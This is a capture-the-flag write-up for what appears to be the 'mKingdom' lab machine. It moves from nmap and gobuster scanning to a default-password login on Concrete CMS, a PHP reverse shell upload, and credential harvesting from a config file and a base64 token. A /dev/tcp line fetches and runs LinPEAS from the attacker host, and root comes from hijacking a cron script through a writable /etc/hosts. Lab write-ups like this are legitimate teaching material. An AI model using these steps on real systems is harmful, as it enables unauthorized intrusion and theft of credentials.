mKingdom

Reconnaissance

nmap -sC -sV -Pn -T4 10.10.x.x

I see that Port 85 work web service http://10.10.x.x:85/

I use gobuster to Fuzzing dir

gobuster dir  -u http://10.10.112.62:85/ --wordlist=/usr/share/wordlists/seclists/Discovery/Web-Content/common.txt 

i Found /app (Status: 301) [Size: 312] [--> http://10.10.112.62:85/app/]

when scroll down i found login page and i use Wayyplazer found CMS Concrete => V8.5.2

File Upload code

when scroll in web site i found username "admin" in /blog

I tried to login with ‘admin’ as username and random passwords, and to my surprise, ‘password’ worked!

Initial Access

According to instructions, I navigated to System & Settings-> Allowed file types, and added ‘.php’ in the allowed file types.

Then I went to Files -> File Manager and uploaded a php reverse shell. I started a Netcat listener on my attacking machine. After uploading the shell, I accessed it from the link provided on the website.

I using reverse shell nc

nc -nvlp 9001

in click URL to File

Revers shell

Priv Esc

To Upgrade the tty

python -c 'import pty;pty.spawn("/bin/bash");'  
ctrl z  
stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

I will try Useing Best tool to look for Linux local privilege escalation vectors: LinPEAS

sudo nc  -lvnp 443 < linpeas.sh #Host
cat < /dev/tcp/10.21.32.157/443 | sh #Victim

i found DB.php

<?php

return [
    'default-connection' => 'concrete',
    'connections' => [
        'concrete' => [
            'driver' => 'c5_pdo_mysql',
            'server' => 'localhost',
            'database' => 'mKingdom',
            'username' => 'toad',
            'password' => 'toadisthebest',
            'character_set' => 'utf8',
            'collation' => 'utf8_unicode_ci',
        ],
    ],
];

I logged in as toad. After a bit of looking around, I listed the current environment variables using ‘env’, and I found a PWD_token.

echo "aWthVGVOVEFOdEVTCg==" | base64  -d
or 
base64 -d <<< aWthVGVOVEFOdEVTCg==

user : mario

pass : ikaTeNTANtES

But i don't cat the flag

i will move file to /tmp

I ran linpeas again as mario, and found that /etc/hosts is writable

curl mkingdom.thm:85/app/castle/application/counter.sh

I modified the /etc/hosts file to add my attacking machine IP and mkingdom.thm as the corresponding hostname. Then I created the folder path /app/castle/application on my attacking machine and placed counter.sh there with a reverse shell payload.

Exploit Used

Tools Used

  • Nmap

  • nc

  • gobuseter

  • linpeas.sh

Other Resources

Last updated